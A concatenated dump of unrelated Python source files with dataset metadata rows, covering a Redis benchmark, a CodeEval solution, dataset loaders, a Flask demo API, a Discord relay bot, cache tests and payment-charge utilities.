    t4 = threading.Thread(target=generate_string, args=(string_size, partition, d4))

    t1.start()
    t2.start()
    t3.start()
    t4.start()

    # Join all four workers (the original joined t1 four times, which could
    # leave t2-t4 unfinished when the test set is assembled).
    t1.join()
    t2.join()
    t3.join()
    t4.join()

    test_set = {}
    test_set.update(d1)
    test_set.update(d2)
    test_set.update(d3)
    test_set.update(d4)

    print(len(test_set))

    print("running tests...")
    r = redis.StrictRedis(host='localhost', port=port, db=0)
    start = time.time()

    print("testing set")
    for k, v in test_set.items():
        r.set(k, v)
    r.wait(3, 0)

    print("testing get")
    for k, v in test_set.items():
        r.get(k)
    r.wait(3, 0)

    end = time.time()
    runtime = end - start
    ops = size * 2
    throughput = float(ops / runtime)
    latency = float(1 / throughput)

    print("total run time: {runtime}s \n\
number of total operations with 50% Set and 50% Get: {ops} \n\
avg. throughput: {throughput} ops/s \n\
avg. latency: {latency} s".format(
        runtime=runtime,
        ops=ops,
        throughput=throughput,
        latency=latency
    ))
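The closing arithmetic — throughput as operations per second, and average latency as its reciprocal — can be factored into a small helper. This is an illustrative refactor; `benchmark_stats` is not part of the original script:

```python
def benchmark_stats(num_ops, runtime_seconds):
    """Return (throughput in ops/s, average latency in s) for a benchmark run."""
    if runtime_seconds <= 0:
        raise ValueError("runtime must be positive")
    throughput = num_ops / runtime_seconds
    latency = 1.0 / throughput
    return throughput, latency
```

Note that latency derived this way is only the mean over the whole run; a real benchmark would also record per-operation timings for percentiles.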
| 22.368932 | 118 | 0.598524 | 313 | 2,304 | 4.297125 | 0.399361 | 0.05948 | 0.062454 | 0.086245 | 0.220074 | 0.220074 | 0.20223 | 0.20223 | 0.172491 | 0 | 0 | 0.042062 | 0.267361 | 2,304 | 102 | 119 | 22.588235 | 0.754739 | 0.085503 | 0 | 0.112676 | 1 | 0 | 0.038314 | 0 | 0 | 0 | 0 | 0.009804 | 0 | 1 | 0.014085 | false | 0 | 0.098592 | 0 | 0.112676 | 0.084507 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
910584bb0f10ffc80b6bcbf199bcc87aa47ac74d | 1,302 | py | Python | challenges/015-setintersection.py | Widdershin/CodeEval | c1c769363763d6f7e1ac5bf3707de2731c3bd926 | [
"MIT"
] | null | null | null | challenges/015-setintersection.py | Widdershin/CodeEval | c1c769363763d6f7e1ac5bf3707de2731c3bd926 | [
"MIT"
] | null | null | null | challenges/015-setintersection.py | Widdershin/CodeEval | c1c769363763d6f7e1ac5bf3707de2731c3bd926 | [
"MIT"
] | null | null | null | """
https://www.codeeval.com/browse/30/
Set Intersection
Challenge Description:
You are given two sorted list of numbers (ascending order). The lists
themselves are comma delimited and the two lists are semicolon
delimited. Print out the intersection of these two sets.
Input Sample:
File containing two lists of ascending order sorted integers, comma
delimited, one per line. E.g.
1,2,3,4;4,5,6
20,21,22;45,46,47
7,8,9;8,9,10,11,12
Output Sample:
Print out the ascending order sorted intersection of the two lists,
one per line. Print empty new line in case the lists have
no intersection. E.g.
4
8,9
"""
###### IO Boilerplate ######
import sys
if len(sys.argv) < 2:
input_file_name = "15-setintersection-in.txt"
else:
input_file_name = sys.argv[1]
with open(input_file_name) as input_file:
input_lines = map(lambda x: x.strip(), filter(lambda x: x != '', input_file.readlines()))
###### /IO Boilerplate ######
def main():
for line in input_lines:
string_sets = line.split(';')
sets = [set(string_set.split(',')) for string_set in string_sets]
intersection = sorted(sets[0].intersection(sets[1]))
print ",".join(intersection)
if __name__ == '__main__':
main()
| 20.666667 | 93 | 0.654378 | 195 | 1,302 | 4.25641 | 0.487179 | 0.054217 | 0.046988 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040554 | 0.223502 | 1,302 | 62 | 94 | 21 | 0.780415 | 0.02381 | 0 | 0 | 0 | 0 | 0.064171 | 0.044563 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.066667 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
911891456d9e7cb41632224dd81128e9e0fa9e6b | 2,776 | py | Python | observations/r/bomsoi.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | observations/r/bomsoi.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | observations/r/bomsoi.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def bomsoi(path):
"""Southern Oscillation Index Data
The Southern Oscillation Index (SOI) is the difference in barometric
pressure at sea level between Tahiti and Darwin. Annual SOI and
Australian rainfall data, for the years 1900-2001, are given.
Australia's annual mean rainfall is an area-weighted average of the
total annual precipitation at approximately 370 rainfall stations around
the country.
This data frame contains the following columns:
Year
a numeric vector
Jan
average January SOI values for each year
Feb
average February SOI values for each year
Mar
average March SOI values for each year
Apr
average April SOI values for each year
May
average May SOI values for each year
Jun
average June SOI values for each year
Jul
average July SOI values for each year
Aug
average August SOI values for each year
Sep
average September SOI values for each year
Oct
average October SOI values for each year
Nov
average November SOI values for each year
Dec
average December SOI values for each year
SOI
a numeric vector consisting of average annual SOI values
avrain
a numeric vector consisting of a weighted average annual rainfall at
a large number of Australian sites
NTrain
Northern Territory rain
northRain
north rain
seRain
southeast rain
eastRain
east rain
southRain
south rain
swRain
southwest rain
Australian Bureau of Meteorology web pages:
http://www.bom.gov.au/climate/change/rain02.txt and
http://www.bom.gov.au/climate/current/soihtm1.shtml
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `bomsoi.csv`.
Returns:
Tuple of np.ndarray `x_train` with 106 rows and 21 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'bomsoi.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/DAAG/bomsoi.csv'
maybe_download_and_extract(path, url,
save_file_name='bomsoi.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
| 22.942149 | 74 | 0.699207 | 390 | 2,776 | 4.905128 | 0.484615 | 0.06116 | 0.075274 | 0.100366 | 0.198641 | 0.023001 | 0 | 0 | 0 | 0 | 0 | 0.01013 | 0.253242 | 2,776 | 120 | 75 | 23.133333 | 0.912687 | 0.67255 | 0 | 0 | 0 | 0 | 0.09126 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.409091 | 0 | 0.5 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9118ae0e8ce4a6964c33407d1f9bb269a5f81229 | 948 | py | Python | openpype/hosts/houdini/plugins/publish/validate_bypass.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/plugins/publish/validate_bypass.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/plugins/publish/validate_bypass.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | import pyblish.api
import openpype.api
class ValidateBypassed(pyblish.api.InstancePlugin):
"""Validate all primitives build hierarchy from attribute when enabled.
The name of the attribute must exist on the prims and have the same name
as Build Hierarchy from Attribute's `Path Attribute` value on the Alembic
ROP node whenever Build Hierarchy from Attribute is enabled.
"""
order = openpype.api.ValidateContentsOrder - 0.1
families = ["*"]
hosts = ["houdini"]
label = "Validate ROP Bypass"
def process(self, instance):
invalid = self.get_invalid(instance)
if invalid:
rop = invalid[0]
raise RuntimeError(
"ROP node %s is set to bypass, publishing cannot continue.." %
rop.path()
)
@classmethod
def get_invalid(cls, instance):
rop = instance[0]
if rop.isBypassed():
return [rop]
| 27.085714 | 78 | 0.632911 | 111 | 948 | 5.387387 | 0.558559 | 0.070234 | 0.090301 | 0.135452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005926 | 0.287975 | 948 | 34 | 79 | 27.882353 | 0.88 | 0.292194 | 0 | 0 | 0 | 0 | 0.131376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.2 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9119b7e105152a68ddb6c7704cd3d58179e633e6 | 4,687 | py | Python | gavPrj/dataset_core.py | GavinK-ai/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | 1 | 2021-11-15T06:16:44.000Z | 2021-11-15T06:16:44.000Z | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | import os
import cv2 as cv
import matplotlib.pyplot as plt
import numpy as np
#srcPaths = ('dataset/Screenshot1','dataset/Screenshot2','dataset/Screenshot3', 'dataset/Screenshot4')
#srcPaths = ('all_dataset/s1',
# 'all_dataset/s10',
# 'all_dataset/s11',
# 'all_dataset/s12',
# 'all_dataset/s13',
# 'all_dataset/s14',
# 'all_dataset/s15',
# 'all_dataset/s16',
# 'all_dataset/s17',
# 'all_dataset/s18',
# 'all_dataset/s19',
# 'all_dataset/s2',
# 'all_dataset/s20',
# 'all_dataset/s21',
# 'all_dataset/s22',
# 'all_dataset/s23',
# 'all_dataset/s24',
# 'all_dataset/s25',
# 'all_dataset/s26',
# 'all_dataset/s27',
# 'all_dataset/s28',
# 'all_dataset/s29',
# 'all_dataset/s3',
# 'all_dataset/s30',
# 'all_dataset/s31',
# 'all_dataset/s32',
# 'all_dataset/s33',
# 'all_dataset/s34',
# 'all_dataset/s35',
# 'all_dataset/s36',
# 'all_dataset/s37',
# 'all_dataset/s38',
# 'all_dataset/s39',
# 'all_dataset/s4',
# 'all_dataset/s40',
# 'all_dataset/s41',
# 'all_dataset/s42',
# 'all_dataset/s43',
# 'all_dataset/s44',
# 'all_dataset/s45',
# 'all_dataset/s46',
# 'all_dataset/s47',
# 'all_dataset/s48',
# 'all_dataset/s49',
# 'all_dataset/s5',
# 'all_dataset/s50',
# 'all_dataset/s51',
# 'all_dataset/s52',
# 'all_dataset/s53',
# 'all_dataset/s54',
# 'all_dataset/s55',
# 'all_dataset/s56',
# 'all_dataset/s57',
# 'all_dataset/s58',
# 'all_dataset/s59',
# 'all_dataset/s6',
# 'all_dataset/s60',
# 'all_dataset/s61',
# 'all_dataset/s62',
# 'all_dataset/s63',
# 'all_dataset/s7',
# 'all_dataset/s8',
# 'all_dataset/s9')
srcPaths = ('testdataset/t1','testdataset/t2')
datasetfilename = 'testdataset1.npz'
def create_dataset(datasetfilename, srcPaths, classNames):
    imgList = []
    labelList = []
    labelNameList = []

    for srcPath in srcPaths:
        # append all files in srcPath dir into imgList and labelList
        for fname in os.listdir(srcPath):
            filePath = os.path.join(srcPath, fname)
            img = cv.imread(filePath)

            # split the extension off the file name to use the stem as the label
            fname_no_ext = os.path.splitext(fname)[0]
            # label = fname_no_ext[-1]
            label = fname_no_ext

            imgList.append(img)
            labelList.append(classNames[label])
            labelNameList.append(label)

    # convert imgList and labelList to numpy arrays
    images = np.array(imgList, dtype='object')
    labels = np.array(labelList, dtype='object')
    labelnames = np.array(labelNameList)

    # save converted images and labels into a compressed numpy zip file
    np.savez_compressed(datasetfilename, images=images, labels=labels, labelnames=labelnames)

    return True


def displayImg():
    # for fname in os.listdir(srcPath):
    pass


if __name__ == '__main__':

    # save a dataset in numpy compressed format
    # datasetfilename = 'tiredataset.npz'
    classNames = {'afiq': 0, 'azureen': 1, 'gavin': 2, 'goke': 3, 'inamul': 4,
                  'jincheng': 5, 'mahmuda': 6, 'numan': 7, 'saseendran': 8}

    if create_dataset(datasetfilename, srcPaths, classNames):
        data = np.load(datasetfilename, allow_pickle=True)
        imgList = data['images']
        labelList = data['labels']
        labelNameList = data['labelnames']

        img = imgList[0]
        label = labelList[0]

        imgRGB = img[:, :, ::-1]
        plt.imshow(imgRGB)
        plt.title(label)
        plt.show()

        print(imgList.shape)
        print(labelList.shape)
# imgList, labelList = create_dataset()
# img = imgList[0]
# label = labelList[0]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[1]
# label = labelList[1]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[3]
# label = labelList[3]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
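The labelling step above strips the file extension and looks the stem up in `classNames`. The same logic in isolation, using a hypothetical helper name:

```python
import os


def label_for_file(fname, class_names):
    """Map an image filename like 'gavin.png' to (integer label, label name),
    using the filename stem as the class-name key."""
    stem = os.path.splitext(fname)[0]
    return class_names[stem], stem
```

A `KeyError` here means an image file whose stem is not registered in `classNames`, which is worth catching explicitly when building larger datasets.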
| 26.331461 | 128 | 0.528056 | 486 | 4,687 | 4.923868 | 0.343621 | 0.263268 | 0.016715 | 0.02173 | 0.165483 | 0.127037 | 0.083577 | 0.083577 | 0.083577 | 0.083577 | 0 | 0.047299 | 0.332409 | 4,687 | 177 | 129 | 26.480226 | 0.717482 | 0.427992 | 0 | 0.047619 | 0 | 0 | 0.058687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.02381 | 0.095238 | 0 | 0.166667 | 0.047619 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9127b9612983c8643c1eb5911a7a12880ad76607 | 803 | py | Python | web13/jsonapi.py | gongjunhuang/web | 9412f6fd7c223174fdb30f4d7a8b61a8e130e329 | [
"Apache-2.0"
] | null | null | null | web13/jsonapi.py | gongjunhuang/web | 9412f6fd7c223174fdb30f4d7a8b61a8e130e329 | [
"Apache-2.0"
] | null | null | null | web13/jsonapi.py | gongjunhuang/web | 9412f6fd7c223174fdb30f4d7a8b61a8e130e329 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, redirect, url_for, jsonify, request
app = Flask(__name__)
users = []
'''
Json api
Accepts JSON in the request form and returns JSON.

Benefits:
1. The communication format is unified, so it imposes fewer constraints on the language
2. Easy to turn into an open api
3. The client does the heavy rendering

RESTful api
Dr. Fielding

URLs are organized around resources (nouns):
GET    /players          fetch all players
GET    /player/id        fetch the data of the player with this id
PUT    /players          full update
PATCH  /players          partial update
DELETE /player/id        delete a player
GET    /player/id/level
'''


@app.route("/", methods=["GET"])
def index():
    return '''<form method=post action='/add'>
    <input type=text name=author>
    <button>Submit</button>
    </form>
    '''


@app.route("/add", methods=["POST"])
def add():
    form = request.form
    users.append(dict(author=form.get("author", "")))
    return redirect(url_for(".index"))


@app.route("/json")
def json():
    return jsonify(users)


app.run()
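The verb/noun pairing described in the module docstring can be written down as a plain dispatch table, which makes the REST mapping explicit. This is illustrative only — it is not how Flask routes requests:

```python
# Each route is identified by (HTTP method, resource path).
ROUTES = {
    ("GET", "/players"): "list all players",
    ("GET", "/player/<id>"): "fetch one player",
    ("PUT", "/players"): "full update",
    ("PATCH", "/players"): "partial update",
    ("DELETE", "/player/<id>"): "delete a player",
}


def describe(method, path):
    """Look up what a method+path pair means in the REST scheme."""
    return ROUTES.get((method.upper(), path), "unknown route")
```

The point of the table is that the path names a resource and the method names the action, so no verbs appear in the URLs themselves.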
912a168bff4536c4b4657348252f51f09a3dbc8c | 1,776 | py | Python | MoMMI/Modules/ss14_nudges.py | T6751/MoMMI | 4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a | [
"MIT"
] | 18 | 2016-08-06T17:31:59.000Z | 2021-12-24T13:08:02.000Z | MoMMI/Modules/ss14_nudges.py | T6751/MoMMI | 4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a | [
"MIT"
] | 29 | 2016-08-07T14:03:00.000Z | 2022-01-23T21:05:33.000Z | MoMMI/Modules/ss14_nudges.py | T6751/MoMMI | 4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a | [
"MIT"
] | 25 | 2016-08-08T12:56:02.000Z | 2022-02-09T07:17:51.000Z | import logging
from typing import Match, Any, Dict
import aiohttp
from discord import Message
from MoMMI import comm_event, command, MChannel, always_command
logger = logging.getLogger(__name__)
@comm_event("ss14")
async def ss14_nudge(channel: MChannel, message: Any, meta: str) -> None:
try:
config: Dict[str, Any] = channel.module_config(f"ss14.servers.{meta}")
except ValueError:
return
expect_password = config["password"]
if expect_password != message.get("password"):
return
if "type" not in message or "contents" not in message:
return
contents = message["contents"]
type = message["type"]
if type == "ooc":
final_message = f"\u200B**OOC**: `{contents['sender']}`: {contents['contents']}"
else:
return
await channel.send(final_message)
@always_command("ss14_relay", unsafe=True)
async def ss14_relay(channel: MChannel, match: Match, message: Message) -> None:
if not channel.internal_name:
return
content = message.content
content = content.strip()
if not content or content[0] == "\u200B":
return
server = None
config: Any
for config in channel.server_config("modules.ss14", []):
if config["discord_channel"] != channel.internal_name:
continue
server = config["server"]
if not server:
return
config = channel.module_config(f"ss14.servers.{server}")
password = config["password"]
url = config["api_url"] + "/ooc"
async with aiohttp.ClientSession() as session:
async with session.post(url, json={"password": password, "sender": message.author.name, "contents": content}) as resp:
r = await resp.text()
logger.error(f"{resp.status}")
| 27.75 | 126 | 0.649212 | 214 | 1,776 | 5.285047 | 0.35514 | 0.013263 | 0.02122 | 0.035367 | 0.054819 | 0.054819 | 0 | 0 | 0 | 0 | 0 | 0.015284 | 0.226351 | 1,776 | 63 | 127 | 28.190476 | 0.80786 | 0 | 0 | 0.148936 | 0 | 0 | 0.141329 | 0.037162 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.085106 | 0.106383 | 0 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
912c1f2c9b394208b14b4781f1f67d739e19f340 | 539 | py | Python | spoon/models/groupmembership.py | mikeboers/Spoon | 9fe4a06be7c2c6c307b79e72893e32f2006de4ea | [
"BSD-3-Clause"
] | 4 | 2017-11-05T02:54:39.000Z | 2022-03-01T06:01:20.000Z | spoon/models/groupmembership.py | mikeboers/Spoon | 9fe4a06be7c2c6c307b79e72893e32f2006de4ea | [
"BSD-3-Clause"
] | null | null | null | spoon/models/groupmembership.py | mikeboers/Spoon | 9fe4a06be7c2c6c307b79e72893e32f2006de4ea | [
"BSD-3-Clause"
] | null | null | null | import sqlalchemy as sa
from ..core import db
class GroupMembership(db.Model):

    __tablename__ = 'group_memberships'
    __table_args__ = dict(
        autoload=True,
        extend_existing=True,
    )

    user = db.relationship('Account',
        foreign_keys='GroupMembership.user_id',
        backref=db.backref('groups', cascade="all, delete-orphan"),
    )

    group = db.relationship('Account',
        foreign_keys='GroupMembership.group_id',
        backref=db.backref('members', cascade="all, delete-orphan"),
    )
| 22.458333 | 68 | 0.651206 | 57 | 539 | 5.894737 | 0.578947 | 0.083333 | 0.125 | 0.166667 | 0.279762 | 0.279762 | 0 | 0 | 0 | 0 | 0 | 0 | 0.226345 | 539 | 23 | 69 | 23.434783 | 0.805755 | 0 | 0 | 0 | 0 | 0 | 0.236059 | 0.087361 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
912dd1c1fee777c8a3a588b4ebb22c1cb4588df4 | 1,790 | py | Python | data/cache/test/test_cache.py | dongboyan77/quay | 8018e5bd80f17e6d855b58b7d5f2792d92675905 | [
"Apache-2.0"
] | 1 | 2020-10-16T19:30:41.000Z | 2020-10-16T19:30:41.000Z | data/cache/test/test_cache.py | dongboyan77/quay | 8018e5bd80f17e6d855b58b7d5f2792d92675905 | [
"Apache-2.0"
] | 15 | 2020-06-18T15:32:06.000Z | 2022-03-03T23:06:24.000Z | data/cache/test/test_cache.py | dongboyan77/quay | 8018e5bd80f17e6d855b58b7d5f2792d92675905 | [
"Apache-2.0"
] | null | null | null | import pytest
from mock import patch
from data.cache import InMemoryDataModelCache, NoopDataModelCache, MemcachedModelCache
from data.cache.cache_key import CacheKey
class MockClient(object):
    def __init__(self, server, **kwargs):
        self.data = {}

    def get(self, key, default=None):
        return self.data.get(key, default)

    def set(self, key, value, expire=None):
        self.data[key] = value


@pytest.mark.parametrize("cache_type", [(NoopDataModelCache), (InMemoryDataModelCache),])
def test_caching(cache_type):
    key = CacheKey("foo", "60m")

    cache = cache_type()

    # Perform two retrievals, and make sure both return.
    assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
    assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}


def test_memcache():
    key = CacheKey("foo", "60m")

    with patch("data.cache.impl.Client", MockClient):
        cache = MemcachedModelCache(("127.0.0.1", "-1"))
        assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
        assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}


def test_memcache_should_cache():
    key = CacheKey("foo", None)

    def sc(value):
        return value["a"] != 1234

    with patch("data.cache.impl.Client", MockClient):
        cache = MemcachedModelCache(("127.0.0.1", "-1"))
        assert cache.retrieve(key, lambda: {"a": 1234}, should_cache=sc) == {"a": 1234}

        # Ensure not cached since the value was `1234`.
        assert cache._get_client().get(key.key) is None

        # Ensure cached.
        assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345}
        assert cache._get_client().get(key.key) is not None
        assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345}
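The `retrieve(key, loader, should_cache=...)` contract these tests exercise can be sketched as a minimal in-memory cache. This illustrates the expected behaviour only — it is not the project's actual `InMemoryDataModelCache`:

```python
class TinyCache:
    """Minimal model cache: call the loader on a miss, and store the result
    only if should_cache approves of the loaded value."""

    def __init__(self):
        self._data = {}

    def retrieve(self, key, loader, should_cache=lambda value: True):
        if key in self._data:
            return self._data[key]
        value = loader()
        if should_cache(value):
            self._data[key] = value
        return value
```

The `should_cache` hook is what the last test verifies: a rejected value is still returned to the caller, but the next retrieval invokes the loader again.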
| 32.545455 | 89 | 0.634078 | 231 | 1,790 | 4.82684 | 0.272727 | 0.049327 | 0.119283 | 0.138117 | 0.463677 | 0.463677 | 0.463677 | 0.463677 | 0.408072 | 0.408072 | 0 | 0.057383 | 0.201676 | 1,790 | 54 | 90 | 33.148148 | 0.722883 | 0.058101 | 0 | 0.352941 | 0 | 0 | 0.06302 | 0.026159 | 0 | 0 | 0 | 0 | 0.264706 | 1 | 0.205882 | false | 0 | 0.117647 | 0.058824 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9134f2e89b9311a8b0265758c45e89d220be134a | 5,948 | py | Python | mtp_send_money/apps/send_money/utils.py | uk-gov-mirror/ministryofjustice.money-to-prisoners-send-money | 80db0cf5f384f93d35387a757605cfddbc98935f | [
"MIT"
] | null | null | null | mtp_send_money/apps/send_money/utils.py | uk-gov-mirror/ministryofjustice.money-to-prisoners-send-money | 80db0cf5f384f93d35387a757605cfddbc98935f | [
"MIT"
] | null | null | null | mtp_send_money/apps/send_money/utils.py | uk-gov-mirror/ministryofjustice.money-to-prisoners-send-money | 80db0cf5f384f93d35387a757605cfddbc98935f | [
"MIT"
] | null | null | null | import datetime
from decimal import Decimal, ROUND_DOWN, ROUND_UP
import logging
import re
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import RegexValidator
from django.utils import formats
from django.utils.cache import patch_cache_control
from django.utils.dateformat import format as format_date
from django.utils.dateparse import parse_date
from django.utils.encoding import force_text
from django.utils.translation import gettext_lazy as _
from django.views.generic import TemplateView
from mtp_common.auth import api_client, urljoin
import requests
from requests.exceptions import Timeout
logger = logging.getLogger('mtp')
prisoner_number_re = re.compile(r'^[a-z]\d\d\d\d[a-z]{2}$', re.IGNORECASE)
def get_api_session():
return api_client.get_authenticated_api_session(
settings.SHARED_API_USERNAME,
settings.SHARED_API_PASSWORD,
)
def check_payment_service_available():
# service is deemed unavailable only if status is explicitly false, not if it cannot be determined
try:
response = requests.get(api_url('/service-availability/'), timeout=5)
gov_uk_status = response.json().get('gov_uk_pay', {})
return gov_uk_status.get('status', True), gov_uk_status.get('message_to_users')
except (Timeout, ValueError):
return True, None
def validate_prisoner_number(value):
if not prisoner_number_re.match(value):
raise ValidationError(_('Incorrect prisoner number format'), code='invalid')
class RejectCardNumberValidator(RegexValidator):
regex = r'\d{4}\s*\d{4}\s*\d{4}\s*\d{4}'
inverse_match = True
code = 'card_number'
message = _('Please do not enter your debit card number here')
def format_percentage(number, decimals=1, trim_zeros=True):
if not isinstance(number, Decimal):
number = Decimal(number)
percentage_text = ('{0:.%sf}' % decimals).format(number)
if decimals and trim_zeros and percentage_text.endswith('.' + ('0' * decimals)):
percentage_text = percentage_text[:-decimals - 1]
return percentage_text + '%'
def currency_format(amount, trim_empty_pence=False):
"""
Formats a number into currency format
@param amount: amount in pounds
@param trim_empty_pence: if True, strip off .00
"""
if not isinstance(amount, Decimal):
amount = unserialise_amount(amount)
text_amount = serialise_amount(amount)
if trim_empty_pence and text_amount.endswith('.00'):
text_amount = text_amount[:-3]
return '£' + text_amount
def currency_format_pence(amount, trim_empty_pence=False):
"""
Formats a number into currency format display pence only as #p
@param amount: amount in pounds
@param trim_empty_pence: if True, strip off .00
"""
if not isinstance(amount, Decimal):
amount = unserialise_amount(amount)
    if abs(amount) < Decimal('1'):
return '%sp' % (amount * Decimal('100')).to_integral_value()
return currency_format(amount, trim_empty_pence=trim_empty_pence)
def clamp_amount(amount):
"""
Round the amount to integer pence,
rounding fractional pence up (away from zero) for any fractional pence value
that is greater than or equal to a tenth of a penny.
@param amount: Decimal amount to round
"""
tenths_of_pennies = (amount * Decimal('1000')).to_integral_value(rounding=ROUND_DOWN)
pounds = tenths_of_pennies / Decimal('1000')
return pounds.quantize(Decimal('1.00'), rounding=ROUND_UP)
def get_service_charge(amount, clamp=True):
if not isinstance(amount, Decimal):
amount = Decimal(amount)
percentage_charge = amount * settings.SERVICE_CHARGE_PERCENTAGE / Decimal('100')
service_charge = percentage_charge + settings.SERVICE_CHARGE_FIXED
if clamp:
return clamp_amount(service_charge)
return service_charge
def get_total_charge(amount, clamp=True):
if not isinstance(amount, Decimal):
amount = Decimal(amount)
charge = get_service_charge(amount, clamp=False)
result = amount + charge
if clamp:
return clamp_amount(result)
return result
def serialise_amount(amount):
return '{0:.2f}'.format(amount)
def unserialise_amount(amount_text):
amount_text = force_text(amount_text)
return Decimal(amount_text)
def serialise_date(date):
return format_date(date, 'Y-m-d')
def unserialise_date(date_text):
date_text = force_text(date_text)
date = parse_date(date_text)
if not date:
raise ValueError('Invalid date')
return date
def lenient_unserialise_date(date_text):
date_text = force_text(date_text)
date_formats = formats.get_format('DATE_INPUT_FORMATS')
for date_format in date_formats:
try:
return datetime.datetime.strptime(date_text, date_format).date()
except (ValueError, TypeError):
continue
raise ValueError('Invalid date')
def govuk_headers():
return {
'Accept': 'application/json',
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % settings.GOVUK_PAY_AUTH_TOKEN
}
